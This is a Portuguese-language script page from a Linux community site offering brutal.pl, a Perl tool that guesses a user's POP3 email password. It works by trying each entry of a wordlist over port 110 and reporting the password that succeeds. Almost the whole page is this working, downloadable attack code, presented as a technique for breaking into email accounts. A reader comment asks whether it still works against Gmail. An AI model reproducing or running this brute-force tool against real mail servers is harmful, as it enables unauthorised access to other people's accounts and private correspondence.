Brutal Force Attack

Publicado por Fábio Berbert de Paula 13/11/2002

[ Hits: 16.374 ]

Homepage: https://fabio.automatizando.dev

Download brutal.zip

0 0
Denuncie   Favoritos   Indicar  



Tenta fazer a adivinhação da senha de um usuário de email através da técnica de invasão por força bruta, ou seja, tentativa e erro. O script utiliza o módulo IO::Socket para efetuar conexão com o servidor POP.

  



Esconder código-fonte

#!/usr/bin/perl
#############################################
# brutal.pl
#
# Programa que simula um ataque brutal force 
# em servidores de email através da tentativa
# de invasão por adivinhação de senha.
#
# Programado por: Fábio Berbert de Paula
# E-mail: fabio@vivaolinux.com.br
# Web Site: www.vivaolinux.com.br
#
# Rio de Janeiro, 12 de Agosto de 2002
# ##########################################

use strict;

use IO::Socket;

if ($#ARGV != 2) {
  print "Use: \n\t$0 popserver username passwd_list\n\nOnde:\n";
  print "\tpopserver = servidor de email\n\tusername = nome do usuário\n";
  print "\tpasswd_list = arquivo com a lista de senhas que serão enviadas para teste\n\n";
  exit(0);
}

my ($server,$user,$pwfile) = @ARGV;

if (! -f $pwfile) {
   print "Erro: $pwfile não é um nome de arquivo válido!\n";
   exit;
}

# para cada senha, tente invadir
open(R,$pwfile);
while (<R>) {
  chomp;
  tryout($server,$user,$_);
}
close(R);


sub tryout {
   my ($server,$user,$passwd) = @_;
   my $state;

   print "Tentativa: $passwd ...\n";
   my $connex = new IO::Socket::INET->new(  
                  PeerAddr  => $server,
                  PeerPort  => "110",
                  Proto     => "tcp",
                  Type      => SOCK_STREAM,
                  Timeout   => "30"
   );
   
   if (!defined($connex)) {
      print "Erro ao conectar ao servidor $server ...\n";
      exit(0);
   }
   
   $state = &readsock($connex);
   $connex->send("USER $user\r\n");
   $state = &readsock($connex);
   if ($state !~ /^\+OK/) { next; }
   $connex->send("PASS $passwd\r\n");
   $state = &readsock($connex);

   if ($state =~ /^\+OK/) { 
      print "Cracked!!! A senha do usuário $user é $passwd\n";
      exit;
   }
   
   $connex -> close;
   sleep(5);
}

sub readsock {
   my ($socket) = @_;
   my $data = '';
   my $buf = '';
   while ($buf !~ /\n$/) {
      $buf=<$socket>;
      $data .= $buf;
   }
   return $data;
}

Scripts recomendados

Gerador de Senhas Aleatórias VERSÃO 2.0

Multi Brute Force

Testando servers a HTMLSCRIPT

Monitor do BO

Mail bomber


  

Comentários
[1] Comentário enviado por iagolira em 02/01/2016 - 20:59h

$ perl brutal.pl smtp.gmail.com fulano@gmail.com list
Erro ao conectar ao servidor smtp.gmail.com ...

Estes script ainda funciona (sei que foi publicado em 2002)?


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Monitorando o Preço do Bitcoin ou sua Cripto Favorita em Tempo Real com um Widget Flutuante

Conhecendo o openSUSE Kalpa

IA Turbina o Desktop Linux enquanto distros renovam forças

Como extrair chaves TOTP 2FA a partir de QRCODE (Google Authenticator)

Linux em 2025: Segurança prática para o usuário

Dicas

Como realizar um ataque de força bruta para desobrir senhas?

Como usar Gpaste no ambiente Cinnamon

Atualizando o Fedora 42 para 43

Como saber se o seu e-mail já teve a senha vazada?

Como descobrir se a sua senha já foi vazada na internet?

Tópicos

Erro ao tentar ativar o secure boot no arch (3)

É normal não gostar de KDE? (18)

Estou tentando ser legalista, mas tá complicado! (2)

Perfil criado no samba ad dc não loga no Windows 10 e 11 (2)

tão metendo a mão! (8)

Top 10 do mês

Scripts

[Shell Script] Task Manager para Terminal

[Shell Script] Atualizar Debian versão 2.0

[Shell Script] fuckdrive - zerador de unidades

[Shell Script] Script para atualizar o Debian 13

[Shell Script] Script para teste de THP no sistema

A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

Site hospedado por: